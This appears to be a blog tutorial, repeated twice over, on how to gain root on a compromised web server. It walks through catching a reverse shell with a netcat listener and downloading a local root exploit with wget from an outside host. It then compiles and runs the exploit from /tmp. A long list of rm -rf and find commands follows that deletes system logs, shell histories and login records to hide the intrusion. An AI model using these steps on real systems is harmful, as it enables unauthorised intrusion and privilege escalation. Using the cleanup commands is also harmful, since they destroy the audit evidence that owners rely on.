Hi guys today i will tell you how to root a server in few easy steps .
Things Required :
NetcaT
Shelled site
Local root expl0it
Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .
![[Image: 11.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlu12Nc55zYR5EW3vkFcGw5TKybzN_bgjHwpiVKB8sIXsbZwSiPcSgcziXRRA6pPHKy5P6Oer6cMwZgWumzohh4e5bxFZ9sE9GYvu5YQYT41IHH-OBemziUrw6gtNB8yPgUg8U6_sEXzk/s1600/11.jpg)
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below.
![[Image: 12.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGFvSdeRidSOnffATy832g21YPjGZsrWUY3kieq09fFk8xJDayfn2Zxda0uXeUSvhNEyN0UuosEVRi2dr6xaYtB499dXaPfLK_mF4UrLzXSF_sNaWIouKF18wObP3hyphenhyphenBRMuI7HfnII6Us/s1600/12.jpg)
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
![[Image: 13.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijaiJbwVgrwA2i11ulNUDHdRwIxwP79TK8VLL6b_sZMYJvkvJ7bYPgwVQmoD9Kao-N5oQ3izxTJzJ3zfxtD_TXYBtqN4Tn6PSMT6zqMqFMxi9HIND8lDMmHDgdBqOO-K3S7t1VSwKL-LE/s1600/13.jpg)
![[Image: CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p...127+AM.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEarkenn_G5qtiJ65xuWm4vliZmiQD7vNfcsYIoF-JwPvjK7dTf4MQUGeUG3G91VAVUBFelJcXvN2KuOXVAaw9oOztpO0AnNZQR7dpuGvgkOnLSrK8kI-fNLehq8EdLtDB2fnrCvPwYs/s1600/CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p+443+4202012+32127+AM.jpg)
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .
![[Image: 14.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzc114LinSVLAb2W7VPJ2UObuNXw7s0FaaIFqChK6suzYM3adA4HFqf-uHh6PBicTDGtB5BsnyjmbGYIGA7V1Wa0esiPh5JIriNgIowdRSU7UcP-PbuoHQlgxrJf6xckF25pvjIq3fak/s1600/14.jpg)
In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function .
Type : wget http://www.somesite.com/exploit.c
Now this will upload the exploit in the tmp folder .
![[Image: 15.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpqNYvM4HfAtNuKddvFhjhClvLra829ToEsMVk0oouc_MXsGKZfq21ObIq4bnLPq8KHowza6ic38BWiIL2cXMzFSGSVsSB_-ntkwr-UKlNATYm-B20EAvQph4S2hmoDnV_wmQqoLhnubE/s1600/15.jpg)
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type: unzip exploit.zip
After we have done all the above steps correctly, its time to give permission so we will type the following command
Type: chmod 777 exploit
Now its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit
Now the exploit will run & the server will be rooted
. To check weather we got root we can type
Type: id or whoami
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
Things Required :
NetcaT
Shelled site
Local root expl0it
Step By Step Tutorial :
First go to Run & type cmd then type : cd C:\Program Files\Netcat ( Make sure that you Netcat is saved in the following directory ) .
![[Image: 11.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlu12Nc55zYR5EW3vkFcGw5TKybzN_bgjHwpiVKB8sIXsbZwSiPcSgcziXRRA6pPHKy5P6Oer6cMwZgWumzohh4e5bxFZ9sE9GYvu5YQYT41IHH-OBemziUrw6gtNB8yPgUg8U6_sEXzk/s1600/11.jpg)
Now Type : nc -n -l -v -p 443 , then it would show like the image shown below.
![[Image: 12.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGFvSdeRidSOnffATy832g21YPjGZsrWUY3kieq09fFk8xJDayfn2Zxda0uXeUSvhNEyN0UuosEVRi2dr6xaYtB499dXaPfLK_mF4UrLzXSF_sNaWIouKF18wObP3hyphenhyphenBRMuI7HfnII6Us/s1600/12.jpg)
Its time to open your shell & then connect using back connect function in your shell ( Make sure that you are not using any Vpn or Proxy ) . Then after the connection is established you will see something as shown in the screenshot below .
![[Image: 13.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijaiJbwVgrwA2i11ulNUDHdRwIxwP79TK8VLL6b_sZMYJvkvJ7bYPgwVQmoD9Kao-N5oQ3izxTJzJ3zfxtD_TXYBtqN4Tn6PSMT6zqMqFMxi9HIND8lDMmHDgdBqOO-K3S7t1VSwKL-LE/s1600/13.jpg)
![[Image: CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p...127+AM.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrEarkenn_G5qtiJ65xuWm4vliZmiQD7vNfcsYIoF-JwPvjK7dTf4MQUGeUG3G91VAVUBFelJcXvN2KuOXVAaw9oOztpO0AnNZQR7dpuGvgkOnLSrK8kI-fNLehq8EdLtDB2fnrCvPwYs/s1600/CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p+443+4202012+32127+AM.jpg)
So you have successfully connected .. Then now we have to get our Local Root Exploit, like mine is 2.6.18-374 2011 .
![[Image: 14.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYzc114LinSVLAb2W7VPJ2UObuNXw7s0FaaIFqChK6suzYM3adA4HFqf-uHh6PBicTDGtB5BsnyjmbGYIGA7V1Wa0esiPh5JIriNgIowdRSU7UcP-PbuoHQlgxrJf6xckF25pvjIq3fak/s1600/14.jpg)
In this step we have to upload our exploit in a writable folder, so instead of wasting our time in finding them ..we can just change the directory to the /tmp folder which is a standard writable folder .
Type this command to change dir to /tmp : cd /tmp
To upload your your exploit we will use wget function .
Type : wget http://www.somesite.com/exploit.c
Now this will upload the exploit in the tmp folder .
![[Image: 15.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpqNYvM4HfAtNuKddvFhjhClvLra829ToEsMVk0oouc_MXsGKZfq21ObIq4bnLPq8KHowza6ic38BWiIL2cXMzFSGSVsSB_-ntkwr-UKlNATYm-B20EAvQph4S2hmoDnV_wmQqoLhnubE/s1600/15.jpg)
(Case 1) if you have uploaded your exploit as .c (exploit.c) the we have to compile it, so to compile it we will type the following command .
Type : gcc exploit.c -o exploit
Keep in mind in the above command exploit refers to the name of your exploit (exploit.c) .so if its properly compiled with no errors & warning then you can proceed or if you get an error then find another exploit.
(Case 2) If you have uploaded your exploit in a zip file then you have to unzip it by typing the below command .
Type: unzip exploit.zip
After we have done all the above steps correctly, its time to give permission so we will type the following command
Type: chmod 777 exploit
Now its time to run the Exploit, to run the exploit we will type the following command
Type: ./exploit
Now the exploit will run & the server will be rooted
Type: id or whoami
Clearing Logs:
Now its our time to clearing our tracks or Logs . so below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
0 Comments:
Post a Comment